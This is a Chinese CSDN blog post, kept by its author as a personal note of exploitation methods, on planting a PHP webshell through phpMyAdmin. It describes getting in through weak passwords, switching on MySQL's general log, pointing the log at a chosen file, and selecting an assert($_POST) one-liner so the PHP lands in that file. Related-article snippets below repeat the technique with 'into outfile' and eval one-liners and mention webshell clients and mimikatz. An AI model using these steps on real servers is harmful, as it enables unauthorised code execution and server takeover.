第一章 phpmyadmin日志一句话写入

最新推荐文章于 2024-05-13 01:54:17 发布
最新推荐文章于 2024-05-13 01:54:17 发布
阅读量516 收藏 1
点赞数
分类专栏: 漏洞 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Heriz_root/article/details/128482294
版权
本文档记录了如何通过phpmyadmin的日志功能写入一句话木马,包括设置日志变量和利用SQL执行命令,以方便后续的web安全渗透测试。
摘要由CSDN通过智能技术生成

第一章 phpmyadmin日志一句话写入

目录

前言

这个系列我就是单纯想保存在我遇到过的一些漏洞利用方式,防止以后再碰到的时候再去搜索了。

一、phpmyadmin 变量

通过弱口令等其他一系列方式,进入到phpmyadmin后,进入变量中寻找如下两个变量名称:

general log #默认保存状态是off
general log file #默认保存路径

在这里插入图片描述

然后通过命令或者手动编辑的方式给修改成 on 以及自己所需要保存的路径

set global general_log=‘on’;
set global general_log_file=’文件路径’

二、phpmyadmin SQL执行

进入到phpmyadmin sql命令执行的界面,直接输入一句话木马

select ‘<?php assert($_POST[“hacker”]);?>’;

最低0.47元/天 解锁文章
zhoess
关注
专栏目录
getshell之Phpmyadmin日志
MoCoCN的博客
08-30 663
@MoCoCN Phpmyadmin日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
利用phpmyadmin日志写入一句话木马
m0_68019293的博客
03-15 2730
首先登陆phpMyadmin后,点击sql模块 先用这一句命令查看它是否存在 secure_file_priv 这项功能,要null不一定等于no哦,如果没有就可以利用来写一个webshell 现在写入一句话木马文件,用into outfile函数 加网站下绝对路径,记住哦要把\ 改为/,因为网站的/ 和根目录下的\是不一样的 现在已经成功的写入一句话木马的文件,这时候就可以用菜刀,蚁剑等工具链接它的文件绝对路径得到它的webshell,这是第一种方式 2 接下来这种呢就是利用日志..
php一句话木马连接客户端_【WEB安全phpmyadmin通过日志写入一句话木马
weixin_39531582的博客
12-04 828
1.想通过into outfile写入一句话木马select '<?php assert($_POST["cmd"];?)>' into outfile 'D:/phpstudy/PHPTutorial/WWW/xx.php';需要知道绝对路径2.执行下来,报错 “MySQL服务器正在使用--secure-file-priv选项运行,因此它无法执行此语句”那么就要知道这个 secure...
phpmyadmin写入一句话木马】操作详情
吉吉的博客
03-16 818
phpmyadmin写入一句话木马操作
【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用
serendipity1130的博客
09-02 944
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径
参考文献
热门推荐
Ω|狐步幻影
10-26 7万+
[ IIS 6 = php 5 + MySQL 5 ]body { font-family:verdana; cursor:default;}td {font-size:14px;color:darkslategray;line-height:150%}a:link {color:whitesmoke}a:hover {color:silver}a:visited
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
运维面试题
weixin_42690304的博客
09-18 2万+
运维面试题 NETWORK 1 请描述TCP/IP协议中主机与主机之间通信的三要素 参考答案 IP地址(IP address) 子网掩码(subnet mask) IP路由(IP router) 2 请描述IP地址的分类及每一类的范围 参考答案 A类1-26 B类128-191 C类192-223 D类224-239组播(多播) E类240-254科研 3 请描述A、B...
MySQL(基础)
Xgg0210的博客
06-29 433
数据库的好处: 实现数据持久化 使用完整的管理系统统一管理,易于查询 . . . 数据库的概念 DB 数据库(database):存储数据的“仓库”。它保存了一系列有组织的数据。 . DBMS 数据库管理系统(Database Management System)。用于管理DB中的数据库(数据库是通过DBMS创建和操作)。 又称为数据库软件(产品)。 常见的数据库管理系统:MySQL、Oracle、DB2、SqlServer等。 . SQL 结构化查询语言(Structure Query Language)
phpmyadmin一句话.txt
07-18
phpmyadmin一句话
php mysql 注入一句话木马_phpmyadmin一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1323
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
小白看完都学会了!查看mysql日志命令_phpmyadmin mysql查看数据库日志命令
最新发布
2401_83977626的博客
05-13 306
小编在这里分享些我自己平时的学习资料,由于篇幅限制,pdf文档的详解资料太全面,细节内容实在太多啦,所以只把部分知识点截图出来粗略的介绍,每个小节点里面都有更细化的内容!开源分享:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】程序员代码面试指南 IT名企算法与数据结构题目最优解这是” 本程序员面试宝典!书中对IT名企代码面试各类题目的最优解进行了总结,并提供了相关代码实现。
phpmyadmin日志文件拿weshell
weixin_51692662的博客
09-22 984
phpmyadmin拿shell
phpmyadmin通过日志写入一句话木马
weixin_45983744的博客
12-26 4393
QQ交流群:876554035 1.想通过into outfile写入一句话木马 select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’; 需要知道绝对路径 2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...
通过写入日志phpmyadmin getshell
m0_60894143的博客
04-14 141
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。select @@basedir可以看到mysql所在的绝对路径。由图可知general_log默认关闭,以及日志的存储路径。general log file 指的是日志的保存路径。这里可以通过phpinfo.php文件查看网站路径。之后就可以上传mimikatz获取密码。常规思路应该是运用工具进行爆破。php版本5.4.45。默认账号密码都是root。进入phpmyadmin。getshell成功。
phpmyadmin利用日志文件写入一句话
Websec
07-16 8513
前提: root权限,已经进入了phpmyadmin后台 1、首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file我们将其改成我们特定的目录文件,我这里写成D:\phpStudy\WWW\test1.php       2...
安装phpMyAdmin,使用into outfile给靶场写入一句话木马
DMXA的博客
10-12 387
通过phpinfo页面中Document_Root参数获取网站绝对路径。通过构建sql写入一句话木马。
phpmyadmin通过日记提权
qq_36034274的博客
08-26 3627
phpmyadmin弱口令经常见到,今天我介绍下phpmyadmin如何提权。 首先, phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 安装过程中,默认路径是WWW/phpmyadmin 获取相关信息: 可以看到,这是phpstudy的集成环境,一般的安装路径就是 磁盘/文件...
CentOS7安装教程:LNMP+phpmyadmin环境搭建第一步
这个教程为初学者提供了一个逐步的指南,帮助他们理解如何在CentOS7上搭建LNMP环境并使用phpMyAdmin,这对于进一步学习服务器管理和Web开发非常有帮助。在实际操作中,可能会遇到各种问题,但只要按照教程步骤并结合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zhoess

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值